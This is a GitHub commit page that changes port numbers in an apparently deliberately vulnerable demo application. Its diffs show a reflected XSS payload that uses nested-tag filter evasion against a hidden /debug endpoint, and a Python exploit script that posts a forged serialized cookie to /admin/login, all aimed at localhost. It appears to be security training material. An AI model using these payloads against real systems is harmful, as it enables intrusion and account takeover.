Skip to content

Commit 6d9e99d

Browse files
committed
Fix port numbers
1 parent 2b6c38b commit 6d9e99d

File tree

2 files changed

+2
-2
lines changed

2 files changed

+2
-2
lines changed

README.md

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -77,7 +77,7 @@ Palo Alto;January;200,000
7777
A reflected XSS vulnerability exists in the application and can be triggered using the _hidden_ `/debug` endpoint as follows:
7878

7979
```
80-
http://localhost:8080/debug?customerId=1&clientId=1&firstName=a&lastName=b&dateOfBirth=123&ssn=123&socialSecurityNum=1&tin=123&phoneNumber=5432<scriscriptpt>alert(1)</sscriptcript>
80+
http://localhost:8081/debug?customerId=1&clientId=1&firstName=a&lastName=b&dateOfBirth=123&ssn=123&socialSecurityNum=1&tin=123&phoneNumber=5432<scriscriptpt>alert(1)</sscriptcript>
8181
```
8282

8383
It raises and alert dialogue and returns the Customer object data.

exploits/JavaSerializationExploit/src/main/java/exploit.py

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,5 +10,5 @@ def console(cmd):
1010
console("javac DoSerialize.java")
1111
cookieval = console("java DoSerialize")
1212
cookie = {'auth': cookieval[1].strip()}
13-
r = requests.post('http://localhost:8080/admin/login', cookies=cookie, data=" ",allow_redirects=True)
13+
r = requests.post('http://localhost:8081/admin/login', cookies=cookie, data=" ",allow_redirects=True)
1414
print r.text

0 commit comments

Comments
 (0)